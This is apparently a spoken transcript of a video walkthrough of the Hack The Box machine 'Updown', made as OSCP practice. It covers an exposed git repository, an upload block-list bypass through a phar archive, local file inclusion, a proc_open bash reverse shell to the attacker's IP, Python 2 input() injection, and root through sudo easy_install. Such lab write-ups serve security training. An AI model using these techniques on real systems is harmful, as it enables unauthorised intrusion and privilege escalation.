Hello, I'm NoxLumens, and today I'm going to be doing Updown from Hackthebox. I am doing this box as a part of TJ Nulls list for the pin 200, so that's the OSCP. I'm doing this as practice. Full transparency, I have gone through this. I've probably gone through this several times by now. I've also watched a few videos on it and read a few walkthroughs. It's pretty much everyone's does it the same, and maybe that's partially because of how the creator made the box. They've set the path up so well that everyone just kind of follows that same trajectory. But I'm going to make this video to kind of solidify these bits in my mind and these bits of information and help myself to learn. So I'm going to start off with a rest scan. And that's my IP. So I'm going to do U limit of 5,000, address, TAC A of 10, 129, 227, 227. I am going to do --SC for default scripts, SV for enumerate versions. I would do ON, and then it would be like this. ON, output it to the nmap format, call it mmap.md. Now, I would do this normally had I not already had this, and I've got it right here, actually, because it takes so long to run. Because this didn't run, it makes me think that there was a problem. Can we even ping that? Ping 10, 129, 227, 227. We can. Which is interesting. Let's do this then. Let's just get rid of that. Okay. Still wonder what it didn't like. SC, enumerate versions. SV, SC, scripts, versions. I'm not really sure what it didn't like there. What's even running them? Okay, well anyway, we can see that port 22 and 80 are open, so HTTP and SSH. If we scroll down, we can see that we get, we see Apache HTTP 2441, and the title is my website up? There, before I even go and look at it, I kind of want to just go ahead and start running gobuster. So gobuster dir pacu http 10 129 227 227 with a word list of users, share, word list, sec list, discovery, web content. Let us do raft word list. Raft what? Raft large. Give me your raft list, buddy. Content raft large. Word list lowercase. Okay. Tag T for threads 50 -- no -error. And I guess that's it. We could do -x for HTML, PHP, log, things like that. Getting a lot of falses, mostly because it's showing 403s. But anyway, so we have dev directory, which I will copy, and we'll put that in our notes. That way we don't lose it. And then we'll go and visit in just a minute. So we'll visit it while this next scan is running. Dev. I want to dig in, and then I'm actually going to just remove those. Okay, so let's go and we see .git as well. I was gonna say let's go and check it out, but more interesting is this .git repository because it means that we can do more. We can do use a tool called git dumper. So git dumper https :// let's see if this works. HTTP 10, 129, 227, 227. And I need to put it in a directory, which I'm going to call git. Response was 404, right? Because I did not say dev. There we go. There we go. Before we move any further, let's go and take a look at the dev website. Dev directory, nothing. Main directory, we see sites. Site is up.htb. And let's just see what this does. Google.com. Debug on. Unsure what's happening there. Google seems to be down. I guess that's because it can't read it. This work? Hacking attempt detected. Okay, thank you. Thank you very much. Nice. Let's oh, okay. Oh, I didn't have debug on. I didn't do this before. I just wanted to see if like what all it's gonna show us. Directory dev.git .git. It's still showing us. Love it. Anyway, we have this already, so let's go ahead and go and look through the .git repo. And also let's add site is up. Site is up.htb, which I actually likely already have it in here. Oh, I don't. Good stuff, which means no spoilers for you. 10, 129, 227, 227. Site is up.htb, xy, and enter. No, I don't want to say this has a different name. Let's tell this. Okay. I just wanted to make sure that it was in there. Anyway, let's move into this git directory and open some stuff up. Let's open this up here in code, VS Code, and take a look at some of these. So there's going to be an admin.php page. It is just denying access at this time. Looks like they're still building it out. .htaccess shows required headers. So it's going to say deny all unless it has the required header of special dev only for you. So let's copy that out and pop that into our notes. We can set that in burpsuite. And that'll allow us to access a page. Let's look a little bit further. Changelog, we see that they are, let's see, beta version. Check a website. Check a bunch of websites. To-do list. Check a bunch of websites. Okay. Multi-threading for faster versions. Remove the upload option. So there's an upload option and a new administrator panel, which is right here, which is what they're working on, I suppose. Yeah, to do all of these things. So we're going to be looking for an upload panel and upload options. You can hear looking at the checker index. We'll start at checker. Is my website up? This is the beta version of the website that we are currently seeing, which means that there's likely another web page for us, virtual host or something of that nature. You can see if post check. You can see several things here. This is the uploads function. It's using time. It's saying if the extension matches any of these, die. So stop. Don't move any further and print out extension not allowed. If it doesn't contain that, it's going to move the file into uploads and call it. It's going to md5 the current time. And then I'm going to make a directory and upload the file. It's going to move the file to that path and then file get contents. Final path explode. Let's see what else. Read the uploaded file. Explode for each website at sites. So it's going to read through the contents of the uploaded file. And then it's going to unlink them at unlink final path to delete the uploaded file. Extensions. Strip position file period. Okay, so it's going to remove everything after the name file or after the file's name. Extension is absolutely false. Extension +1. Okay, and then let's go check index. This is only for developers. So we see include function for PHP. With include, we think about local file inclusion. It is preventing some of that by making it so that you can't access bin user home var etc. Include. Oh, if page does not equal any of these, then it's going to get the page and append .php to it, which is good for us. Can be good for us. This means that we can upload a file as long as it doesn't need any of these or contain any of these types of extensions. Okay, we've got this information. Let's get rid of that. Bye-bye. Goodbye, code. And then let's do some buzzing, which we will do here. And I'm actually going to remove this filter on size for your benefit. So we're going to do fuzz faster, you fool, with the word list of user share, word list, burpsuite, directory list, lowercase. Let's go back into seclist. Seclist. Seclist is discovery, right? Web content, raft, large, word list, lowercase. Probably doesn't matter too much. URL of HTTP 10.129.227.227. And then we're going to set a header host fuzz.site is up.htb. We'll let it run real fast. And now we see where the filter comes from. So we can filter on size of 1131. We'll let these come through, and we already see one. We see dev. Because I split the window, it's freaking out. I'll let you know that dev's the only thing that we end up finding. So let's sudo nano etc host. Yep. And add that dev.site is up.htb. Now, here you would want to probably run refscan or mmap again now that you have these files in your etc host file. So just keep that in mind. That is something that you would want to do because it might show you something new. Not in this instance, but it might. So let's go ahead and do this. So we found dev.site is up.htb as well. We added that to our etc host file, but let's go ahead and just mark that down and let's go check it out. HTTP it was dev.site is up.htb, and we get it forbidden. However, as we've read in the source code, which I didn't take a screenshot of or start up. So let me pull up another window and we'll code current directory. So we know here that it's looking for the special header for this header, right? So we can go ahead and add this into something like burpsuite. And with burpsuite on, we can just direct it, right? And add that header. So it'll add the header automatically for us. Okay, so if we go to proxy settings, scroll all the way down to match and replace rules. Please act properly. Then we'll add. So let's add the special dev only header. Special dev only for dev header. Into this, and then we're going to call it dev.site is up.htb. Whatever, request header. Just as a comment. We can see that it's active. Now, when we close this out, intercept doesn't need to be on, but our proxy does. Foxy proxy does need to be on, which it is set to burpsuite. So if we refresh the page, we now get the dev.site is up page. Inspect and storage, maybe. Storage. Not storage, it's not any of this. Ignore exactly what I was saying. So this is our upload function. Can access the changelog. We can access this page where we believe that LFI, we have LFI, local file inclusion. Go to this. Wonder if this will work. I don't know. I guess we'll find out. Oh, this would be remote file. Let's see. Yeah, whatever. We'll try it. um, X page equals admin or other pages. Checker.php. Ignore that. Checker. Well, that'll work. Probably not. Right, because it's appending. If it were to work, it would be. Actually, it would probably just get rid of all of this, right? Because of this, the way that the command was working. Because of, I guess partially that, but the other function that was like that was stripping everything after the period. Yeah. Anyway, we'll come back to this. Let's fiddle with this upload first. Can we do? So let's look at these file extensions and see what they're missing, because they are in fact missing some stuff. We see them covering many things here, but the thing that they are forgetting, as far as like the PHP goes, are far files like this, like far. That's kind of a problem with block list, right? An allow list, you could specify specifically what files are allowed. It's in the name. But with a block list, you have to make sure that you get every file, any file that you're not wanting to upload or uploaded. You have to make sure that it's included. This is for devs only. It is up. Changelog. Anyway, let's do some fun. Let's see what happens. So we'll upload regular file. File too large. Right. Right. Because we have a 10 kilobyte size limit. For that purpose, we have to probably make our own. So cd ls make dir www cd into it. Then, so we're working with PHP. Let's do PHP info.php. Yeah, PHP info.php. Actually, I probably don't need to do all that. PHP info, xy enter. And then we're going to create a far file. So zip, and I don't really think that it matters what you're calling it, as long as it doesn't contain, any of these files extensions. These extensions, so we can do info.nox, php info.nox, and then if we do what? Let's say hex edit. That might work. I can show you this. php info.php. That would work. I got the right file. Info.php. Info.nox. So these bits here, this is a zip. These are the magic bytes for a zip file. And that seems to be what it's checking. So let's come and take a look. We go and we upload this. Updown, dub, info.nox. Upload it. So we get an upload, but we also see the first bytes, PK. We know that an uploads directory exists. So let's duplicate the tab and upload the uploads directory, or move to the uploads directory, where we see our MD5 time. And then inside of that, we see the file, or we see the FAR file. And then inside of the zipped file, we have our PHP info. What did I call it? I did call it PHP info. Yeah. PHP info dot PHP HTTP. Let's see if this didn't work. That also didn't work. F.site is up, uploads, blah, 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 blah. Let's remove that. ls zip info dot var php info dot php. Let's give this a shot. Our upload directory. .var upload. Get it again. We should have a new directory here for the new time. We do. That's our admin page. Info.var. And I don't remember what I call it. PHP info.php. PHP info.php. HTTP. I hate that it does that. Cool. So we actually do get the PHP info page back, which is quite interesting because let's see who we're running as. So we're running as data on site. Dev.site is up. So if we have LFI here, we should now be able to browse to this directory from admin by inserting var and then our directory, and I have another backslash here. So as long as the site hasn't deleted this, we should end up getting it back if Google doesn't steal it first, the dirty bastard. Paste. Dev.site is up, page uploads the file info.var php info.php. And let's check our uploads. It's still there. Oh. Right, so remember that this page is, it's appending the .php. Come on, bro. It's appending the .php for us. I was really hoping to see that gone. What did I forget? I forgot var copy. There we go. So we've just confirmed local file inclusion. The thing that should come to mind next is like, how can I really like exploit this? Can we move up directories, further into directories? Can we find like credentials, anything like that? And if you go and you search around, maybe you'll find something. But if you recall all of these directories, where are they? Bin, user, home, var, etc. They're all being checked. So it's stopping you from checking, some of the most important folders. However, something that we can do and check for at this point, the only thing stopping us from moving forward are some dirty little functions here. So we're going to try and get a reverse shell, but before that, we need to find out what dangerous PHP functions do we actually have. So this is our list of PHP functions that are available, or that the website has disabled that the web page has disabled, the server has disabled. But we know that that's what we want to do. So we want to look for way to search for disabled functions. Which is where some good old fashioned Googling comes along. Disable functions in PHP. I don't want to do that. GitHub. I'm actually looking for a very specific GitHub page that I ended up using. This funcpaw. Yeah, we can pull some of these up and just see what they have, but let's see. And like some of these are fine. They're just large or too large. This one doesn't appear to be too large because it's under the 10 kilobyte file size. Read proc maps. Interesting memory regions. Needle haystack string length. Not really liking that one. No. This one's decent. It's massive when you're it's not massive, but it's massive for when you're dependent on like a 10 kilobyte, or when you're bound by a 10 kilobyte uploads maximum. That one's fine size wise. I'm gonna do some more Googling. And see what we can find. GitHub PHP bypass function. And we come across the defunct bypasser. Looking at this Python file, we see that it is Python 2. I had trouble getting it to run. You could probably just ask ChatGPT to fix it for you. But what I'm going to do, at least this time, is what I saw IPSec do. I really liked it. I thought it was really, really cool, really smart way of doing it. So we're going to create our own PHP script, which I love the idea of. So let's go ahead and do this. We're in the Git. That's in Git. I don't care so much about Git anymore, at least not right now, the second. So let's do this. CD up, code, current, and inside of our dev folder, let's make whatever, danger.php. Danger. We'll get all of our stuff in there. PHP info. Oh, PHP. Let's close that out. Checker equals array. And now we will create a for loop. Actually, I'm not done here. I need, where's word wrap. There are more than this here. So we only grabbed those, but there are also these down here. The other functions. I missed the tabs on it. Quotes. So we'll quickly grab these. Finally, image magic. So you really only need to do this if you don't see the dangerous script yourself, or the whatever, the disabled function. If you don't see the function, that's not disabled. But what we're going to do is for each checker, it could have been a function, whatever, for each checker as a function, we will, if the function exists, function so if the function exists, then we're going to echo out that the function exists. That it is enabled. And do I have the, I close it there, open, and then we're going to print it out to a new line. We're going to create a new line, put a new line out there. So again, I saw IPsec do this. I thought, damn, that is incredible. Why couldn't we do that? So let's do that. So now we can test this to see if it actually works. ls php. Make sure that we don't get any errors. Danger.php. To print out everything. So let's go ahead and zip that up. ls. And we will do the same thing. Zip. Danger.php. So zip info.far into danger.php. I really feel like we should be able to do anything here. I don't think that should matter. I don't know why it does matter. Remove info.far. We're going to test this out. Maybe it has to be a FAR or a zip file format, but I really don't think that it does. So let's come back. We shouldn't have anything here anymore because it ends up getting rid of stuff. So let's browse. We don't want danger.php because it's going to just kick that out. So info.php, let's upload it. I cannot tell if that worked. And it doesn't seem like it did. But it did. Okay. And there's that. So the only thing that we need here is this. And the only thing we need to change is that. And set this to danger. And it should append it on its own. And it doesn't, because this is now, is it called info? What did I call it? Info.nox, right. See if that works. And it does, awesome. Yeah, so it's again, it's not checking anything, and this still equates to a zip file. So we're able to really put anything that's not like, you know, the functions, where are they? In the skit, is it checker? Yeah, anything that's not one of these, that doesn't match one of these extensions, we should be fine. putting it in there, but we can see here that the proc open is enabled. So let's look this up. Proc open reverse shell. You can see that I've Googled that before. And keep in mind, we still have the size constraints. And scrolling down, we see this section here, talking about spawning a shell. And I haven't set all of this up. I'm not even sure if the entire file will work. Anyway, so open a reverse connection. We don't care about that. We care about this, only spawning the shell. Because what we want is to try to get it to pull back to us. So let's take this bit here. Nano, ls, okay. And then let's do this. Yeah, whatever. Let's touch rev.php. And then check this out. Goodbye, checker. Goodbye, danger. Hello, rev. The only thing here that we need to do is set our shell. Shell equals -sc, and because I don't remember the bash-c bash-i reverse shell, we're going to go to revshells.com and look up bash-i. Their IP the same. 10.14.93. Good on port 9001. I'm looking for PHP. We're not looking for PHP. We're looking for bash-i. And we will use bash. Okay, so let's copy. Now we can put that. So bash-c, bash-i. Send it to dev TCP 10.10.14.93 port 9001. And we need to terminate it, or we need it in the line. So there we go. There's that. Scripture spec array. Standard input, standard output, standard error. And then I'm going to call process proc open. Okay. All that seems right. So let's go ahead and do this. Let's come back and we'll zip up rev.nox. We'll zip up rev.php as rev.nox. And we'll take that and we'll come back over. And get rid of some of these tabs. Yeah, files are empty again. And we'll upload that. Upload rev.nox. Check for it. There it is. Get rid of that. We'll snag this out. Some things are going to change. So we're going to call the file rev, the folder, the archive file is rev.nox, and then this has changed. Now we can go ahead and clear. Start up an RL wrap. Netcat listener 9001. And then record God's forbidding. We get a connection and we do. Excellent. Cool. So just to recap, we started off. Site is up.htb. HTTP. Site is up.htb. So we started off doing some directory busing. We ended up finding the Git directory. We downloaded the Git directory with Git dumper. We came to the website, we took a look around, we did some looking, and we see site is up.htb. So we added that to our etc host file. We would have typically, if I didn't already know the path forward, or gone through it so many times, we would have already, we would have done some more testing here. But anyway, we did some directory busing, and then we did some vhost enumeration, fuzzing, and then we ended up locating dev.site is up along with the git file. Parsing through the git data, we found that it required some special headers, special dev, only for dev. Admin.php is not configured yet. There you go. It dies every time we go to it. We ended up finding that the include statement here is vulnerable to local file inclusion. It removes, or I guess it's appending.php to everything. But if you're matching any of these, so you can't navigate to any of these files. Bin, user, home, var, etc. And then let's check checker. So the upload, we're limited by file size, so we have to have a 10 kilobyte file, 10 or less kilobyte file. It cannot contain any of these. This is a block list. So we see zip. There's a few other types of archive files, but they forgot the farchive, baby, the PHP archive, which allows us, to still reach in, grab the file, and execute it. Especially since it's going to go right ahead and append a .php for us, as well as run through the code, which is kind of perfect for us. And from there, we were able to get to the get the PHP info information, find out what files or what functions were disabled, take those functions, end up creating a script with the disabled functions to search through and find out which ones we did have access to, which ended up to be the, was it proc open? Yeah, proc open. And from that, we used that in order to create our reverse shell, which we now have, and we're now here. Searching through some of this, we see the two directories. We see HTML and dev. Something we might be interested in is obviously the flag. Hello. I don't know anybody that's not interested in the flag. If we cat user.text, we get a permission denied. So let's see what's going on here. A few things stand out. One, developer can read the user.flag file. And we don't have access to any of these folders. However, there is a dev folder. So let's cd the dev. Let's see what we have going on here. We see site is up.test. At that, site is up underscore test.py. And based on these print statements, we can tell that this is Python 2. Python 1 and Python 3 would both have done it like this. They would have gone print test, whatever, right? With the, are these parentheses? Oh my god. That probably not. I've forgotten. I don't know. Anyway, the whole point is we're using Python 2. Python 2, and we can see here that it's using an input. It has an input field. Python 2 inputs are vulnerable. Code execution. So Python 2 exploitation. Python 2 input exploitations, abusing Python input. We scroll down far enough, come across this statement here. In order to abuse this behavior, we can use import to import a module, and ultimately we want to evaluate the following. So they're doing they're using netcat to get a reverse shell, spawn a reverse shell. We don't have to worry about doing that. We can just import OS system and then execute as bash and elevate our privileges right here, right now. So let's do site is up. And I may have goofed there. Import os.system bash ID. Okay, so I didn't goof. Voice cracked. I didn't goof. I could have, but I didn't. So let's see. If we see there was an SSH directory, so let's go find out. Let's actually find out where we are right now. Okay, let's move up a directory. lsec.la cd2.ssh ls.la cat id rsa, and we get a private key. So let's take this and let's log in as developer, because we know that the other port that was open was do we want to do it here? Yeah, whatever. Nano ID RSA. We know that the only other port open was 22. Go ahead and paste that in. X, Y, enter. Let's change it to 600 ID ls ll ID RSA. Only the user can read and write. So now we can use that SSH tag I developer at 10.129. Doesn't matter. The site is up.htb. No. Go. Okay. Awesome. Let's kill our top titty up there. So sudo tech l, and it looks like we can run. We can run easy install. Checking gtfobins. We see that if we can run easy install with sudo privileges, then we can just escalate because it doesn't drop the elevated privileges. Take this command and read through it a little bit. So we're making directory, we're importing os.exec, bin shell c sh setup.py, and then sudo to easy install. So we need to put our full path because we do have sudo privileges, but it's actually the full path. So sudo user local bin easy install, call it, and then who are we? We are root. From there we can navigate to root. The hell am I? I'm in root. Okay. And then cat root.text x word count pictures 33. We can do the same thing. I'm in home developer user.text. So that is Updown from Hackthebox. I'm so thankful that you stuck here with me through all of this. It's taken me quite a while to really go through this, understand everything that's happening. I think that initially it took like an entire day to go through it, mostly because I'm not the best at programming. And if you just go straight up and run the defunct script, it encounters some errors, or at least I encountered some errors, and so you have to fix those. And that's just because, you know, I didn't look through the disabled functions closely enough. So we needed to go through that to get the function that actually was that was not disabled, and then we were able to look that up and move into our initial access as dev data. Anyway, I was excited to share this with you. I love this whole entire setup. I love that, like, how many different skills you ended up using throughout the box. And I kind of, man, I don't know what it is about these Linux boxes, but I definitely find them more difficult than the Windows ones. Anyway, I just want to thank you for joining me. I hope that you learned something today. I learned quite a bit going through Updown. If you want more content like this, go ahead and check out this video. If you don't want, or if you want more content than just a single video, why don't you check out this entire playlist of videos? I'm going through TJ Nulls lists, and I've made these specifically for you and for me. I guess mostly for me. Sorry, but I need to learn Hopefully that these help you learn as well. And I hope that you have a good day. See ya.